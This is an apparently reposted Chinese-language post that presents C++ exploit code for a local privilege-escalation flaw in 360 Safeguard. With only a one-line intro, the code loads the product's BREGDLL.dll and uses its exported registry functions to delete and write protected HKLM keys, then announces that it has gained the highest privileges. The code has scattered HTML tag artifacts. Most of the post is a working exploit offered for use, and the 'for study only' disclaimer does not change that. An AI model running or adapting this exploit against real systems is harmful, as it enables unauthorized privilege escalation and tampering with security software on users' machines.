360衛士本地提權漏洞——後門利用程式

很邪惡的代碼，有興趣的看看~~~

 

//////////////////////////////////////////////////////////////////////////<br />// Fuck360.cpp 原始碼僅供學習交流，請不要嘗試非法用途！<br />#include <windows.h><br />typedef BOOL (WINAPI *INIT_REG_ENGINE)();<br />typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);<br />typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);<br />typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);<br />typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);<br />BREG_DELETE_KEYBRegDeleteKey = NULL;<br />BREG_OPEN_KEYBRegOpenKey = NULL;<br />BREG_CLOSE_KEYBRegCloseKey = NULL;<br />REG_SET_VALUE_EXBRegSetValueEx = NULL;<br />#define AppPath"Software//Microsoft//Windows//CurrentVersion//App Paths//360safe.exe"<br />#define TestDeleteKeyHKEY_LOCAL_MACHINE<br />#define TestDeleteRegPath"Software//360Safe//Update"<br />#define TestSetKeyHKEY_LOCAL_MACHINE<br />#define TestSetPath"Software//360Safe"<br />BOOL InitBRegDll()<br />{<br />LONG lResult;<br />HKEY hKey;</p><p>CHAR cPath[MAX_PATH + 32] = { 0 };<br />DWORD dwPathLen = MAX_PATH;</p><p>lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);<br />if (FAILED(lResult))<br />return FALSE;</p><p>DWORD dwType = REG_SZ;<br />lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);<br />RegCloseKey(hKey);<br />if (FAILED(lResult))<br />return FALSE;</p><p>strcat(cPath, "//deepscan//BREGDLL.dll");<br />HMODULE modBReg = LoadLibraryA(cPath);<br />if (!modBReg)<br />return FALSE;<br />INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");<br />BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");<br />BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");<br />BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");<br />BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");</p><p>if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {<br />FreeLibrary(modBReg);<br />return FALSE;<br />}</p><p>if (!InitRegEngine()) {<br />FreeLibrary(modBReg);<br />return FALSE;<br />}</p><p>return TRUE;<br />}<br />LONG TestSetRegKey()<br />{<br />HKEY hKey;<br />LONG lResult;</p><p>lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);<br />if (FAILED(lResult))<br />return lResult;</p><p>DWORD dwType = REG_SZ;<br />static char szData[] = "TEST VALUE";<br />lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));<br />BRegCloseKey(hKey);</p><p>return lResult;<br />}<br />int main(int argc, char *argv[])<br />{<br />if (!InitBRegDll()) {<br />MessageBoxA(NULL, "初始化BReg失敗!", "失敗", MB_ICONSTOP);<br />return 1;</p><p>}<br />if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {<br />MessageBoxA(NULL, "索引值刪除失敗!", "失敗", MB_ICONSTOP);<br />return 2;</p><p>}</p><p>if (FAILED(TestSetRegKey())) {<br />MessageBoxA(NULL, "設定索引值失敗!", "失敗", MB_ICONSTOP);<br />return 3;<br />}</p><p>MessageBoxA(NULL, "突破系統安全檢查，獲得最高許可權，漏洞利用成功!", "成功", MB_OK);<br />return 0;<br />}

 

相關連結：http://www.sebug.net/exploit/19048/